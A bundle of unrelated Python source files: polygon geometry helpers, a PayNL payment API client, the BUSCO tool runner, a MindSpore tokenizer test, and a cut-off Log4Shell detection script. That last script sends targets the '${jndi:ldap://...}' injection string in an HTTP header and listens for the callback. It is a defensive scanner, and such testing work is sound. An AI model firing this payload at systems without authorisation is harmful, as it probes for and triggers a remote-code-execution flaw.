normal_arr[i] = edge_normal(*edge_arr[i])
if is_invert:
normal_arr[i] = neg_vector(normal_arr[i])
return normal_arr
def is_convex(edge_arr):
v1 = edge_dir(*edge_arr[-1])
v2 = edge_dir(*edge_arr[0])
last_mlt = vector_mlt(v2, v1)
for i in range(1, len(edge_arr)):
v1 = edge_dir(*edge_arr[i - 1])
v2 = edge_dir(*edge_arr[i])
mlt = vector_mlt(v2, v1)
if mlt * last_mlt <= 0:
return False
last_mlt = mlt
return copysign(1, last_mlt)
def is_visible(point, cut):
temp1 = (point[0] - cut[0][0]) * (cut[1][1] - cut[0][1])
temp2 = (point[1] - cut[0][1]) * (cut[1][0] - cut[0][0])
return temp1 - temp2
def is_cross(seg, cut):
view0 = is_visible(seg[0], cut)
view1 = is_visible(seg[1], cut)
return view0*view1 <= 0
def matrix_det(a, b, c, d):
return a*d - b*c
def cross_point(edge, line):
A1, B1, C1 = line_equation(*edge)
A2, B2, C2 = line_equation(*line)
det = matrix_det(A2, B2, A1, B1)
if det == 0:
point = line[1]
else:
point = [0, 0]
point[0] = -matrix_det(C2, B2, C1, B1) / det
point[1] = -matrix_det(A2, C2, A1, C1) / det
if (point[0] - edge[0][0]) * (point[0] - edge[1][0]) <= 0 and \
(point[1] - edge[0][1]) * (point[1] - edge[1][1]) <= 0:
return point
else:
return None
def find_cross(edge1, edge2):
A1, B1, C1 = line_equation(*edge1)
A2, B2, C2 = line_equation(*edge2)
det = matrix_det(A2, B2, A1, B1)
if det == 0:
return edge1[1]
point = [0, 0]
point[0] = -matrix_det(C2, B2, C1, B1) / det
point[1] = -matrix_det(A2, C2, A1, C1) / det
return point
|
import json
import sys
import requests
import base64
from paynlsdk2.api.requestbase import RequestBase
from paynlsdk2.exceptions import ErrorException
from paynlsdk2.validators import ParamValidator
PAYNL_END_POINT = "https://rest-api.pay.nl"
PAYNL_CLIENT_VERSION = "1.0.0"
class APIAuthentication(object):
"""
API Authentication details
:cvar str api_token: API token
:cvar str service_id: service ID in the form of SL-xxxx-xxxx
:cvar str token_code: service ID in the form of AT-xxxx-xxxx
:cvar bool use_http_auth: whether we use basic HTTP authentication or not.
You should never really change this: Basic HTTP auth should be used by default!
"""
api_token = None
service_id = None
token_code = None
use_http_auth = True
class APIClient(object):
print_debug = False
def __init__(self):
self.__supported_status_codes = [200]
self.end_point = PAYNL_END_POINT
self.client_version = PAYNL_CLIENT_VERSION
self.api_token = None
self.service_id = None
def get_auth(self, as_string=True):
"""
Get Basic HTTP auth string to use in header
:param as_string: whether to return as string. If False, returns bytes
:type as_string: bool
:return: generated auth
:rtype: str
"""
enc = base64.b64encode('{}:{}'.format(APIAuthentication.token_code, APIAuthentication.api_token).encode())
if as_string:
return enc.decode()
else:
return enc
def user_agent(self):
# type: () -> str
"""
Get user agent string (will be used when calling the API)
:return: API user agent
:rtype: str
"""
version = '{0}.{1}.{2}'.format(sys.version_info[0], sys.version_info[1], sys.version_info[2])
return "PAYNL/SDK/{0} Python/{1} ({2})".format(self.client_version, version, sys.hexversion)
def perform_request(self,
request,
method='POST'
):
# type: (RequestBase, str) -> NoneResponse
"""
Performs the actual call to the API and fill the responses.
This method will basically verify the given :class:`paynlsdk2.api.requestbase.RequestBase` class,
perform the call to the API, interpret the result and fill the request's
:ivar:`paynlsdk2.api.requestbase.RequestBase.response`.
Interpreting the result is done by evaluating the returned JSON using marshmallow.
When validation is complete, the request class will internally set the response, which is always an instance
of a :class:`paynlsdk2.api.responsebase.ResponseBase` instance
.. seealso::
:class:`paynlsdk2.api.requestbase.RequestBase` and all it's derived classes
:class:`paynlsdk2.api.responsebase.ResponseBase` and all it's derived classes
:param request: the generic request to perform
:type request: paynlsdk2.api.requestbase.RequestBase
:param method: HTTP method (stick to POST!)
:type method: str
:return: void
:rtype: void
:raise paynlsdk2.exceptions.ErrorException: generic error occurred
:raise paynlsdk2.exceptions.SchemaException: error occurred during result parsing (schema load/validation failure)
"""
headers = {
'Accept': 'application/json',
'User-Agent': self.user_agent()
}
if APIAuthentication.use_http_auth:
headers['Authorization'] = 'Basic {auth}'.format(auth=self.get_auth())
# Lazy loader for api credentials.
if request.requires_api_token() and ParamValidator.is_empty(request.api_token)\
and ParamValidator.not_empty(APIAuthentication.api_token):
request.api_token = APIAuthentication.api_token
if request.requires_service_id() and ParamValidator.is_empty(request.service_id)\
and ParamValidator.not_empty(APIAuthentication.service_id):
request.service_id = APIAuthentication.service_id
# Build url
url = "{0}/{1}".format(PAYNL_END_POINT, request.get_url())
parameters = request.get_parameters()
if APIAuthentication.use_http_auth and 'token' in parameters:
del parameters['token']
if self.print_debug:
print("Calling {} using {}".format(url, method))
print("HTTP Headers: {}".format(json.dumps(headers)))
print("Params: {}".format(json.dumps(parameters)))
if method.upper() == 'GET':
response = requests.get(url, verify=True, headers=headers, params=parameters)
else:
response = requests.post(url, verify=True, headers=headers, data=parameters)
if response.status_code not in self.__supported_status_codes:
response.raise_for_status()
if self.print_debug:
print("Response object: {}".format(response))
print("Raw response: {}".format(response.text))
# Now the we have a response, let the request class handle the response.
request.raw_response = response.text
if self.print_debug:
print(type(request.response))
if request.response.is_error():
raise ErrorException(request.response.request)
|
<filename>src/busco/busco_tools/Toolset.py
#!/usr/bin/env python3
# coding: utf-8
"""
.. module:: Toolset
:synopsis: the interface to OS enables to run executables / scripts
in external processes
.. versionadded:: 3.0.0
.. versionchanged:: 4.0.0
Copyright (c) 2016-2021, <NAME> (<EMAIL>)
Licensed under the MIT license. See LICENSE.md file.
"""
import os
import subprocess
from subprocess import TimeoutExpired
from multiprocessing import Process, Pool, Value, set_start_method
import time
from abc import ABCMeta, abstractmethod
from busco.BuscoLogger import BuscoLogger
from busco.BuscoLogger import LogDecorator as log
from busco.Exceptions import BatchFatalError
logger = BuscoLogger.get_logger(__name__)
class Job(Process):
"""
Build and executes one work item in an external process
"""
def __init__(
self, tool_name, cmd, job_outlogger, job_errlogger, timeout, cwd, **kwargs
):
"""
:param name: a name of an executable / script ("a tool") to be run
:type cmd: list
:param thread_id: an int id for the thread
:type thread_id: int
"""
# initialize parent
super().__init__()
self.tool_name = tool_name
self.cmd_line = [cmd]
self.job_outlogger = job_outlogger
self.job_errlogger = job_errlogger
self.timeout = timeout
self.cwd = cwd
self.kwargs = kwargs
def add_parameter(self, parameter):
"""
Append parameter to the command line
:parameter: a parameter
:type parameter: str
"""
self.cmd_line.append(parameter)
@log("cmd call: {}", logger, attr_name="cmd_line", apply="join", debug=True)
def run(self):
"""
Start external process and block the current thread's execution
till the process' run is over
"""
with open(self.job_outlogger, "wb") as f_out:
with open(self.job_errlogger, "wb") as f_err:
try:
process = subprocess.run(
self.cmd_line,
stdout=subprocess.PIPE, # stdout and stderr streams are stored and written to file after job completion
stderr=subprocess.PIPE,
cwd=self.cwd,
shell=False,
timeout=self.timeout,
)
except TimeoutExpired:
logger.warning(
"The following job was killed as it was taking too long (>1hr) to "
"complete.\n{}".format(" ".join(self.cmd_line))
)
f_out.write(process.stdout)
f_err.write(process.stderr)
with cnt.get_lock():
cnt.value += 1
class ToolException(Exception):
"""
Module-specific exception
"""
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
class Tool(metaclass=ABCMeta):
"""
Collection of utility methods used by all tools
"""
set_start_method("spawn", force=True)
def __init__(self):
"""
Initialize job list for a tool
:param name: the name of the tool to execute
:type name: str
:param config: initialized instance of ConfigParser
:type config: configparser.ConfigParser
"""
if self.name == "augustus":
self.kwargs = {"augustus_out": True}
self.timeout = 3600 # Possibly no longer necessary from 5.2.0 with the new logging system in place, but no harm to leave it here
else:
self.kwargs = {}
self.timeout = None
self.jobs_to_run = []
self.jobs_running = []
self.nb_done = 0
self.total = 0
self.cpus = None
self.chunksize = None
self.cwd = os.getcwd()
@abstractmethod
def configure_job(self):
pass
@abstractmethod
def generate_job_args(self):
pass
@property
@abstractmethod
def name(self):
raise NotImplementedError
@abstractmethod
def write_checkpoint_file(self):
pass
def create_job(self):
"""
Create one work item
"""
job = Job(
self.name,
self.cmd[:],
self.logfile_path_out,
self.logfile_path_err,
self.timeout,
self.cwd,
**self.kwargs
)
self.jobs_to_run.append(job)
return job
def remove_job(self, job):
"""
Remove one work item
:param job: the Job to remove
:type job: Job
"""
self.jobs_to_run.remove(job)
def log_jobs_to_run(self):
logger.info(
"Running {} job(s) on {}, starting at {}".format(
self.total, self.name, time.strftime("%m/%d/%Y %H:%M:%S")
)
)
return
@log("No jobs to run on {}", logger, attr_name="name", iswarn=True)
def log_no_jobs(self):
return
def run_jobs(self):
if self.total > 0:
self.log_jobs_to_run()
else:
self.log_no_jobs()
return
if self.cpus is None:
raise BatchFatalError("Number of CPUs not specified.")
elif self.cpus == 0:
raise BatchFatalError("Number of CPUs must be greater than 0.")
with Pool(
self.cpus, initializer=type(self).init_globals, initargs=(Value("i", 0),)
) as job_pool:
job_pool.map(
self.run_job, self.generate_job_args(), chunksize=self.chunksize
)
self.write_checkpoint_file()
def run_job(self, args):
args = (
(args,) if isinstance(args, str) else tuple(args or (args,))
) # Ensure args are tuples that can be unpacked. If no args, args=None, which is falsy, and this evaluates to (None,)
job = self.configure_job(*args)
job.run()
self.nb_done = cnt.value
if (
self.nb_done == self.total
or int(self.nb_done % float(self.total / 10)) == 0
):
self._track_progress()
@log(
"[{0}]\t{1} of {2} task(s) completed",
logger,
attr_name=["name", "nb_done", "total"],
on_func_exit=True,
)
def _track_progress(self):
return
@classmethod
def init_globals(cls, counter):
"""Counter code adapted from the answer here: https://stackoverflow.com/a/53621343/4844311"""
global cnt
cnt = counter
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Testing WordpieceTokenizer op in DE
"""
import numpy as np
import mindspore.dataset as ds
from mindspore import log as logger
import mindspore.dataset.text as nlp
WORDPIECE_TOKENIZER_FILE = "../data/dataset/testTokenizerData/wordpiece_tokenizer.txt"
vocab_english = [
"book", "cholera", "era", "favor", "##ite", "my", "is", "love", "dur", "##ing", "the"
]
vocab_chinese = [
"我", '最', '喜', '欢', '的', '书', '是', '霍', '乱', '时', '期', '爱', '情'
]
vocab_mix = vocab_chinese + vocab_english
test_paras = [
dict(
first=1,
last=10,
expect_str=[['my'], ['favor', '##ite'], ['book'], ['is'], ['love'], ['dur', '##ing'], ['the'], ['cholera'],
['era'], ['[UNK]']],
vocab_list=vocab_english
),
dict(
first=1,
last=10,
expect_str=[['my'], ['favor', '##ite'], ['book'], ['is'], ['love'], ['dur', '##ing'], ['the'], ['cholera'],
['era'], ['what']],
vocab_list=vocab_english,
unknown_token=""
),
dict(
first=1,
last=10,
expect_str=[['my'], ['[UNK]'], ['book'], ['is'], ['love'], ['[UNK]'], ['the'], ['[UNK]'], ['era'], ['[UNK]']],
vocab_list=vocab_english,
max_bytes_per_token=4
),
dict(
first=11,
last=25,
expect_str=[['我'], ['最'], ['喜'], ['欢'], ['的'], ['书'], ['是'], ['霍'], ['乱'], ['时'], ['期'], ['的'], ['爱'], ['情'],
['[UNK]']],
vocab_list=vocab_chinese,
),
dict(
first=25,
last=25,
expect_str=[['您']],
vocab_list=vocab_chinese,
unknown_token=""
),
dict(
first=1,
last=25,
expect_str=[
['my'], ['favor', '##ite'], ['book'], ['is'], ['love'], ['dur', '##ing'], ['the'], ['cholera'], ['era'],
['[UNK]'],
['我'], ['最'], ['喜'], ['欢'], ['的'], ['书'], ['是'], ['霍'], ['乱'], ['时'], ['期'], ['的'], ['爱'], ['情'],
['[UNK]']],
vocab_list=vocab_mix,
),
]
def check_wordpiece_tokenizer(first, last, expect_str, vocab_list, unknown_token='[UNK]', max_bytes_per_token=100):
dataset = ds.TextFileDataset(WORDPIECE_TOKENIZER_FILE, shuffle=False)
if first > 1:
dataset = dataset.skip(first - 1)
if last >= first:
dataset = dataset.take(last - first + 1)
vocab = nlp.Vocab.from_list(vocab_list)
tokenizer_op = nlp.WordpieceTokenizer(vocab=vocab, unknown_token=unknown_token,
max_bytes_per_token=max_bytes_per_token)
dataset = dataset.map(operations=tokenizer_op)
count = 0
for i in dataset.create_dict_iterator():
text = nlp.to_str(i['text'])
logger.info("Out:", text)
logger.info("Exp:", expect_str[count])
np.testing.assert_array_equal(text, expect_str[count])
count = count + 1
def test_wordpiece_tokenizer():
"""
Test WordpieceTokenizer
"""
for paras in test_paras:
check_wordpiece_tokenizer(**paras)
if __name__ == '__main__':
test_wordpiece_tokenizer()
|
#!/usr/bin/env python3
#------------------------------------------------------------------------------
# log4sh-detect.py
#
# Tests the Specified Host for the log4shell Vulnerability.
#
# NOTE(s):
#
# * Morty and Morty's Creations ASSUMES ZERO LIABILITY relating to the
# results obtained by this script.
#
# * The exploit *REQUIRES* that the host being exploited can connect BACK
# to a "rogue" server for further command.
#
# * The protocol used to trigger an outbound connection on the exploited
# host is IRRELEVANT (besides a WAF Blocking Action which may hit ONLY
# a SPECIFIC protocol).
#
# * The host being used to run the (this) Detection Program MUST BE ABLE
# TO BIND to the port sent within the exploit.
#
# - This means that firewall (and / or Malware Apps) on the host running
# this script needs access to open a Listening Port.
#
# - Attempting to run this script OVER THE INTERNET will require the
# host running this script to either be FULLY INTERNET FACING or have
# a Port Map from the Externally-Facing IP / Port to the host
# running this script.
#
# Morty
# Copyright (c) 2021 by Morty's Creations - 2021-12-14
#------------------------------------------------------------------------------
# IMPORTS
#------------------------------------------------------------------------------
from pprint import (pprint, pformat)
from datetime import (datetime)
from threading import (Thread, Event)
try:
from threading import Queue
except:
try:
from queue import Queue
except:
pass
import getopt
import logging
import os
import random
import requests
import select
import signal
import socket
import string
import struct
import sys
import time
import urllib.request
import urllib3
#------------------------------------------------------------------------------
_ = [
pprint,
pformat,
time
]
#------------------------------------------------------------------------------
PROGRAM = os.path.basename(sys.argv[0])
VERSION = "1.6"
REVISION = "20211220-1"
AUTHOR = "Morty (Morty's Creations)"
#------------------------------------------------------------------------------
# GLOBALS / CONSTANTS
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
USER_AGENT = ("MortysCreations_log4sh-detect/%s" % (VERSION))
#------------------------------------------------------------------------------
RETVAL_NOT_VULNERABLE = 0
RETVAL_VULNERABLE = 1
RETVAL_NO_TEST = 2
RETVAL_TEST_FAILED = 3
RETVAL_PATCHED = 4
#------------------------------------------------------------------------------
NETWORK_DIR_LABELS = {
"Receive" : " <-- ",
"Send" : " --> ",
}
#------------------------------------------------------------------------------
PROXY_NONE = {
"http" : None,
"https" : None,
}
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
def DATETIME_STRING() :
return(datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
#------------------------------------------------------------------------------
WANT_EXCEPTIONS = False
#------------------------------------------------------------------------------
LEN_RAND_DATA = 30
#------------------------------------------------------------------------------
PORT_EXPLOIT_CB_DEF = 1389
#------------------------------------------------------------------------------
HEADER_NAME_EXPLOIT = "X-Api-Version"
#------------------------------------------------------------------------------
TIMEOUT_EXPLOIT_CB = 10.0
#------------------------------------------------------------------------------
TIMEOUT_SOCKET_SELECT = 2.0
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
LDAP_BIND_SUCCESS = (
b"\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00")
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
g_debug = False
g_requestLogger = None
g_resultOnly = False
g_evtAppExit = Event()
#------------------------------------------------------------------------------
g_tcpThread = None
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
class TCPThread(Thread):
#----------------------------------------------------------------------------
def __init__(
self,
addr = None,
port = 1389,
timeout = TIMEOUT_EXPLOIT_CB,
searchString = None):
Thread.__init__(self)
self._addr = (addr or TCPThread.getPrimaryIP())
self._port = port
self._socket = None
self._evtTerm = Event()
self._timeout = (timeout * 1000)
self._searchString = searchString
self._portTestDone = False
self._result = False
self._clients = {}
self._qLog = Queue()
#----------------------------------------------------------------------------
def begin(self):
self._debug("TCPThread: begin()")
ret = None
try:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setblocking(0)
if(self._socket is not None):
self._port = self.bindToPort(self._port)
if(self._port is not None):
self._socket.listen(1)
self.start()
ret = self._port
except:
self._socket = None
ret = None
if(WANT_EXCEPTIONS): raise
return(ret)
#----------------------------------------------------------------------------
@staticmethod
def socketShutdown(sock, qLog:Queue):
ret = False
#addr = ":".join(sock.get("raddr", ""))
addr = TCPThread.getSocketInfo(sock)
try:
sock.setsockopt(socket.SOL_SOCKET,
socket.SO_LINGER,
struct.pack('ii', 1, 0))
sock.shutdown(socket.SHUT_RDWR)
sock.close()
ret = True
except Exception as e:
qLog.put("TCPThread::socketClose - EXCEPTION [socket = %s]: %s" %
(addr, str(e)))
if(WANT_EXCEPTIONS): raise
if(g_debug):
qLog.put("TCPThread::socketClose [socket = %s]: cleanup Complete: %s" %
(addr, str(ret)))
return(ret)
#----------------------------------------------------------------------------
def cancel(self):
self._debug("TCPThread::cancel BEGIN")
if(self._evtTerm is not None):
self._evtTerm.set()
#----------------------------------------------------------------------------
def getResult(self):
return(self._result)
#----------------------------------------------------------------------------
def run(self):
# The Socket Server uses NON-BLOCKING Sockets (via select()) so that we
# can (gracefully) terminate as needed.
# This function is long and messy, and can probably be modularized for
# neater code, but my goal was to encapsulate this into a SINGLE SCRIPT,
# so leaving it as-is for now!
self._debug("TCPThread::run() BEGIN")
sockList = [self._socket]
msStart = time.time() * 1000
while (not self._evtTerm.is_set()):
# self._debug("About to Wait for Socket select()...")
(rr, rw, err) = select.select(sockList,
sockList,
sockList,
TIMEOUT_SOCKET_SELECT)
# self._debug("Socket select() Complete:\n rr = %d\n rw = %d\n err = %d" %
# (len(rr), len(rw), len(err)))
for rs in rr:
# READABLE SOCKETS:
if(rs == self._socket):
# READABLE LISTENER (SERVER) SOCKET:
(conn, addr) = rs.accept()
self._clients[conn] = {
"state" : "init",
"addr" : ("%s:%d" % (addr[0], addr[1])),
"conn" : conn,
}
self._debug("Received Connection on Port %d from %s:%d%s" % (
self._port,
addr[0],
addr[1],
(" [CALLBACK_PORT_TEST_NOT_EXPLOIT]"
if(not(self._portTestDone)) else "")))
if(not(self._portTestDone)):
self._portTestDone = True
conn.setblocking(0)
sockList.append(conn)
else:
# READABLE CLIENT SOCKET
client = self._clients.get(rs, None)
if(client is not None):
data = rs.recv(1024)
dataAscii = TCPThread.decodeToAscii(data)
if(data):
if(g_debug):
TCPThread.hexdump(data, rs, self._qLog, "Receive")
if(client["state"] == "init"):
client["state"] = "ldap_bind_request_received"
elif(client["state"] == "ldap_bind_success_sent"):
if(self._searchString is not None):
if(self._searchString in dataAscii):
self._result = True
self._debug("TCPThread/run(): Search String Found: %s" %
(self._searchString))
break
else:
self._debug("Connection Closed: %s" % (client["addr"]))
sockList.remove(rs)
for ws in rw:
# WRITABLE SOCKETS
client = self._clients.get(ws, None)
if(client is not None):
if(client["state"] == "ldap_bind_request_received"):
ws.send(LDAP_BIND_SUCCESS)
self._debug("Sent LDAP Bind Success to Client: %s" % (client["addr"]))
client["state"] = "ldap_bind_success_sent"
elif(client["state"] == "ldap_bind_success_sent"):
pass
for es in err:
# ERROR SOCKET
client = self._clients.get(es, None)
if(client is not None):
self._debug("Socket Error: %s" % (client["addr"]))
es.close()
del self._clients[es]
sockList.remove(es)
if(self._result):
self._debug("TCPThread.run(): Search String Found; Exiting Thread...")
break
elif(((time.time() * 1000) - msStart) >= self._timeout):
self._debug("TCPThread.run(): Timeout Reached [%d]; Exiting Thread..." %
(self._timeout))
break
sockList.reverse()
for sock in sockList:
if(sock is not None):
TCPThread.socketShutdown(sock, self._qLog)
sockList.remove(sock)
self._debug("TCPThread::run() COMPLETE")
#----------------------------------------------------------------------------
def bindToPort(self, port = None):
ret = None
if(self._socket is not None):
if(port is None):
for port in range(10000, 32767):
try:
self._socket.bind((self._addr, port))
self._debug("Socket Bound to %s:%d..." % (self._addr, port))
ret = port
break
except:
pass
else:
try:
self._socket.bind((self._addr, port))
self._debug("Socket Bound to %s:%d..." % (self._addr, port))
ret = port
except:
if(WANT_EXCEPTIONS): raise
return(ret)
#----------------------------------------------------------------------------
def _debug(self, msg, rawLine = False):
if(g_debug):
if(rawLine):
self._qLog.put("%s" % (msg))
else:
self._qLog.put("%s [DEBUG] %s" % (
DATETIME_STRING(),
msg))
#----------------------------------------------------------------------------
def flushDebugQueue(self, file = sys.stderr):
while(self._qLog.qsize() > 0):
line = self._qLog.get()
self._qLog.task_done()
print(line, file = file)
#----------------------------------------------------------------------------
@staticmethod
def getSocketInfo(sock, separator = " "):
ret = "[not_connected]"
try:
ret = ("%s:%d%s%s:%d" % (
*sock.getsockname(),
separator,
*sock.getpeername()))
except:
ret = "[not_connected]"
return(ret)
#----------------------------------------------------------------------------
@staticmethod
def decodeToAscii(data):
ret = None
if(type(data) is bytes):
try:
ret = data.decode("iso-8859-1")
except:
ret = None
if(WANT_EXCEPTIONS): raise
return(ret)
#----------------------------------------------------------------------------
@staticmethod
def hexdump(dataIn, sock:socket, qLog:Queue, action = "Receive"):
data = None
if(type(dataIn) is bytes):
try:
data = TCPThread.decodeToAscii(dataIn)
except Exception as e:
_ = e
data = None
if(WANT_EXCEPTIONS): raise
else:
data = dataIn
"""
0000 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 ........ ........
YYYY-MM-DD HH:MM:SS 255.255.255.255:32767 --> 255.255.255.255:32767
"""
if(data is None):
return
offset = 0
qLog.put("\n%-19s %-47s %d bytes" % (
DATETIME_STRING(),
TCPThread.getSocketInfo(sock,
NETWORK_DIR_LABELS.get(action, " ")),
len(data)))
while (len(data) > 0):
endIdx = (15 if(len(data) >= 16) else len(data))
line = data[0:endIdx]
strHex = ""
strAsc = ""
for bi in range(0, len(line)):
if((bi > 0) and (bi % 8 == 0)):
strHex += " "
strAsc += " "
strHex += (" %02x" % (ord(line[bi])))
if((ord(data[bi]) >= ord(' ')) and (ord(line[bi]) <= ord('~'))):
strAsc += chr(ord(line[bi]))
else:
strAsc += "."
qLog.put("%-04s %-48s %s" % (
("{:04x}".format(offset)),
strHex,
strAsc))
if(endIdx < 15):
break
else:
data = data[16:]
offset += len(line)
print("", file = sys.stderr)
#----------------------------------------------------------------------------
@staticmethod
def getPrimaryIP():
ret = None
try:
hn = socket.gethostname()
if(hn is not None):
ret = socket.gethostbyname(hn)
except:
ret = None
if(WANT_EXCEPTIONS): raise
return(ret)
#----------------------------------------------------------------------------
@staticmethod
def waitForThread(t, cancel = False):
ret = None
joined = False
if(cancel): t.cancel()
while not joined:
try:
t.join(500)
if(not(t.is_alive())):
joined = True
ret = t.getResult()
t.flushDebugQueue()
except:
pass
return(ret)
#----------------------------------------------------------------------------
#----------------------------------------------------------------------------
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
def usage():
print("\n%s v%s Rev%s\n%s\n" % (PROGRAM, VERSION, REVISION, AUTHOR))
print("Usage: %s [-erTWx] [--skip-http-test] [-i|p|h|t <arg>] <url>" % (
PROGRAM))
print("""
OPTIONS:
-h | --help this message
url url to test for exploit
-d | --debug enable debugging output
-v | --debug-verbose enable verbose debug output (requests lib)
-e | --exploit-only send exploit request ONLY (NO RESULT)
-r | --result-only results only (no status)
-i | --ip-callback <ip> ip for exploit callback
-p | --port-callback <port | a> port for exploit callback (a* = auto)
-H | --header <hdr_name> header name sent in exploit
-t | --timeout <timeout> timeout for exploit in seconds
-T | --skip-callback-test skip reachability test [NOT RECOMMENDED!]
-x | --use-system-proxy send exploit request via Proxy
-W | --disable-warnings disable warnings [NOT RECOMMENDED!]
--skip-http-test skip http test [NOT RECOMMENDED!]
""")
print("""
NOTES / **DISCLAIMER**:
* The exploit *REQUIRES* that the host being exploited can connect BACK
to a "rogue" server for further command.
* The protocol used to trigger an outbound connection on the exploited
host is IRRELEVANT (besides a WAF Blocking Action which may hit ONLY
a SPECIFIC protocol).
* The host being used to run the (this) Detection Program MUST BE ABLE
TO BIND to the port sent within the exploit.
- This means that firewall (and / or Malware Apps) on the host running
this script needs access to open a Listening Port.
- Attempting to run this script OVER THE INTERNET will require the
host running this script to either be FULLY INTERNET FACING or have
a Port Map from the Externally-Facing IP / Port to the host
running this script.
* RETURN VALUES:
VALUE TEST_STATUS VULNERABLE
0 SUCCEEDED NO
1 SUCCEEDED YES
2 NOT PERFORMED N/A [Script Usage Only]
3 FAILED N/A
4 SUCCEEDED NO (PATCHED) [NEW v1.5]
* Morty and Morty's Creations ASSUMES ZERO LIABILITY relating to the
results obtained by this script.
** USE AT YOUR OWN RISK **
""")
sys.exit(RETVAL_NO_TEST)
#------------------------------------------------------------------------------
def debug(msg, file = sys.stderr, extraLineFeed = True):
if(g_debug):
print("%s [DEBUG] %s%s" % (
DATETIME_STRING(),
msg,
("\n" if(extraLineFeed) else "")),
file = file)
#------------------------------------------------------------------------------
def quote(s):
if(" " in s):
if(len(s) > 0):
if(s[0] != "\""): s = "\"" + s
if(s[-1] != "\""): s = s + "\""
return(s)
#------------------------------------------------------------------------------
def printStatus(action, file = sys.stderr, **kwargs):
if(not(g_resultOnly)):
print("%s %s" % (DATETIME_STRING(), action), file = file)
for k in kwargs:
print("%-30s %s" % (k, str(kwargs[k])), file = file)
print("", file = file)
#------------------------------------------------------------------------------
def errorexit(msg):
print(msg, file = sys.stderr)
exit(RETVAL_TEST_FAILED)
#------------------------------------------------------------------------------
def signalHandler(signum, frame):
global g_evtAppExit
debug("signalHandler: Caught Signal %d..." % (signum))
if(g_tcpThread is not None):
g_tcpThread.cancel()
if(g_evtAppExit is not None):
g_evtAppExit.set()
#------------------------------------------------------------------------------
def setLogging(logEnabled = None, logRequestsLib = None):
global g_debug
global g_requestLogger
ret = False
if(logEnabled is not None):
g_debug = logEnabled
logging.getLogger().setLevel(logging.DEBUG)
if(logRequestsLib is not None):
try:
rLog = logging.getLogger("urllib3")
if(rLog is not None):
if(logRequestsLib):
if(g_requestLogger is None):
g_requestLogger = logging.StreamHandler(sys.stderr)
rLog.addHandler(g_requestLogger)
rLog.setLevel(logging.DEBUG)
#rLog.propagate = False
ret = True
else:
ret = True
elif(g_requestLogger is not None):
rLog.removeHandler(g_requestLogger)
g_requestLogger = None
ret = True
else:
ret = True
except:
raise
ret = False
return(ret)
#------------------------------------------------------------------------------
def exploitCBTestWarning():
print("""
WARNING! WARNING! WARNING! Skip Callback Test Specified!
* The Callback Test validates the return path to this test script!
* If the Callback IP / Port is UNREACHABLE, RESULTS MAY BE INVALID!
* [Morty certainly hopes you know what the heck you're doing!]
""")
#------------------------------------------------------------------------------
def proxyWarning():
print("""
WARNING! WARNING! WARNING! System Proxy Set but NOT USED!
* A system proxy was detected, but the script is OVERRIDING IT!
* This can be overriden via the (-x or --use-system-proxy) option.
* Sending the Exploit Request via Proxy IS PERFECTLY VALID, but, of course,
can be troublesome for testing INTERNAL SYSTEMS.
""")
#------------------------------------------------------------------------------
def exploitCBTest(exploitCBIP, exploitCBPort):
ret = False
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((exploitCBIP, exploitCBPort))
sock.close()
ret = True
except:
ret = False
return(ret)
#------------------------------------------------------------------------------
def sendExploitedRequest(
url,
exploitHeaderName = "X-Api-Version",
exploitCBIP = None,
exploitCBPort = 1389,
exploitCBUserData = None,
useProxy = False,
requestTimeout = 8.0,
noExploit = False):
try:
urllib3.disable_warnings()
except:
pass
proxies = (PROXY_NONE if(not(useProxy)) else urllib.request.getproxies())
# ${jndi:ldap://${LDAP_HOST}:${LDAP_PORT}/${LDAP_USERDATA}}
ret = {
"succeeded" : False,
"status" : -1,
"error" : "",
}
headers = {
"User-Agent" : USER_AGENT,
}
if(not(noExploit)):
headers[exploitHeaderName] = ("${jndi:ldap://%s:%d/%s}" % (
exploitCBIP,
exploitCBPort,
exploitCBUserData))
if("://" in url):
(p, u) = url.split("://")
protos = [p]
url = u
else:
protos = ["http", "https"]
for proto in protos:
try:
session = requests.Session()
session.trust_env = useProxy
response = session.get(
("%s://%s" % (proto, url)),
verify = False,
headers = headers,
proxies = proxies,
timeout = requestTimeout)
ret["succeeded"] = True
ret["status"] = response.status_code
break
except Exception as e:
ret["succeeded"] = False
ret["error"] = str(e)
if(WANT_EXCEPTIONS): raise
return(ret)
#------------------------------------------------------------------------------
def isSystemProxyEnabled():
ret = None
try:
proxies = urllib.request.getproxies()
if((proxies != {}) and (proxies != PROXY_NONE)):
ret = True
else:
ret = False
except:
ret = None
debug("isSystemProxyEnabled: %s" % (
("[DETECTION_FAILED]" if(ret is None) else (str(ret)))))
return(ret)
#------------------------------------------------------------------------------
def main():
## Globals Modified in Function
global g_tcpThread
global g_resultOnly
## Status Variables
retval = RETVAL_TEST_FAILED
cbOk = None
cbTestSkipped = False
proxyEnabled = False
exploitSucceeded = False
httpTestSucceeded = False
## Option Initialization
exploitOnly = False
exploitHeaderName = HEADER_NAME_EXPLOIT
exploitCBIP = TCPThread.getPrimaryIP()
exploitCBPort = PORT_EXPLOIT_CB_DEF
exploitCBUserData = None
exploitCBTimeout = TIMEOUT_EXPLOIT_CB
useProxy = False
disableWarnings = False
skipHTTPTest = False
## Option Processing BEGIN ------------------------------------------
for sig in [signal.SIGINT, signal.SIGTERM]:
try:
signal.signal(sig, signalHandler)
except:
print("WARNING: Failed to trap Signal %d" % (sig), file = sys.stderr)
try:
